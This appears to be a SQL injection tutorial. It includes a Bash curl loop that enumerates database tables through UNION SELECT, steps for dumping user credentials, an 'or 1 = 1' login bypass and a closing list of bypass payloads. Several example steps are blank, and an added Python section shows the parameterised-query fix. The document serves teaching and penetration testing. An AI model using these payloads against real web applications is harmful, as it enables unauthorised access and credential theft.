SQL INJECTION

SQLI


Basic example applied to fake web service


We verify that the web application is vulnerable to SQL injection:


We enumerate until we match the number of columns to generate the labels:


We take advantage of the generated labels to see whether we are able to view files on the system, and also to learn the version of the database service and the user that runs it:



We begin to list the database tables:


We set up a script in Bash (or in another language) to quickly determine which tables exist in the database, parsing the results according to the case presented to us:

for i in $(seq 1 200); do
    echo -n "For number $i: "
    # The loop counter goes into the LIMIT clause; the table name comes back
    # inside the page's Title element, so keep only the text before the "<".
    curl --silent "http://www.webpage.com/contents?Id=-1+UNION+SELECT+1,table_name,3,4,5+from+information_schema.tables+limit+$i--%20-" \
        | grep "Title" | cut -d '>' -f 2 | awk -F '<' '{print $1}'
done

Obtaining results like the following:

For number 63: HEADBOARD
For number 64: DOCUMENTS
For number 65: CONTENTS
For number 66: DOCUMENTS
For number 67: SCHEDULES
For number 68: LANGUAGES
For number 69: IMAGES
For number 70: MODULES
For number 71: NEWS
For number 72: PERMISSIONS
For number 73: USERS

Once the table that interests us is located (for this case, the users table), we list the existing columns for said table in the database:


For this step it is necessary to convert the string users from a plain string into its ASCII character codes. We will obtain the following results:

IDUSUERT,IDECOMPANY,USUER,PASSWORD,NAME,ADMINISTRATOR

Once we know the names of the columns, we take advantage of the group_concat functionality to concatenate all the columns whose data we want to visualize:


Obtaining the username and password.

Before getting complicated, it is preferable to test basic injections on authentication panels, that is:

User: admin 'or 1 = 1 -- -
Password: admin 'or 1 = 1 -- -

For cases where we can register a new user, another way is to create a user with the name admin 'or 1 = 1 -- - and the password admin 'or 1 = 1 -- -. After subsequently authenticating as a valid user, we will have access to all the user data in the main database.
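As an added illustration (not code from the original post), the Python snippet below builds the login query in two ways against a constructed in-memory SQLite table and runs the admin 'or 1 = 1 -- - payload from above through both, so the reason the bypass works, and the fix, can be seen side by side; the table and column names are assumptions.

```python
import sqlite3

# Constructed sample data; the users table and its columns are assumptions
# modelled loosely on the table enumerated in the write-up.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER, username TEXT, password TEXT, "
        "administrator INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [(1, "admin", "s3cret-admin", 1), (2, "alice", "alice-pass", 0)],
    )
    return conn


def login_vulnerable(conn, username, password):
    # The query is built by string concatenation: the quote in the payload
    # closes the literal, "or 1 = 1" makes the WHERE clause always true and
    # "-- -" comments out the password check that follows.
    query = (
        f"SELECT id, username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    # Placeholders: the driver binds both values as data, never as SQL, so the
    # payload is compared literally against the column and matches nothing.
    query = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


PAYLOAD = "admin 'or 1 = 1 -- -"  # the basic bypass from the post


def demo():
    conn = make_db()
    bypass = login_vulnerable(conn, PAYLOAD, PAYLOAD)  # every row comes back
    blocked = login_safe(conn, PAYLOAD, PAYLOAD)       # no row matches
    legit = login_safe(conn, "admin", "s3cret-admin")  # real credentials still work
    return bypass, blocked, legit


if __name__ == "__main__":
    print(demo())
```

The vulnerable path returns both users for the payload, which is exactly the "access to all user data" described above; the parameterised path returns nothing for it and still authenticates real credentials.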

For bypassing techniques consult the following link

In case we want to execute commands on the system, we can take advantage of the fact that files can be written from SQL queries to generate our malicious file. To do this, we would apply the following syntax as an example:



Next, a set of test payloads to try on login forms once the conventional 'or 1 '=' 1 has been tried:

- ' 
'  ' 
' & ' 
' ^ ' 
' * ' 
' or ' ' - ' 
' or ' '  ' 
' or ' ' & ' 
' or ' ' ^ ' 
' or ' ' * '
"-" 
"" 
"&" 
"^" 
"*" 
"or" "-" 
"or "" " 
" or "" & " 
" or "" ^ " 
" or "" * " 
or true-- 
" or true-- 
'or true--
") or true-- 
') or true-- 
' or 'x' = 'x 
') or ('x') = ('x 
')) or (('x')) = (('x 
" or " x " = " x 
" ) or ( " x " ) = ( " x 
" )) or (( " x " )) = (( " x
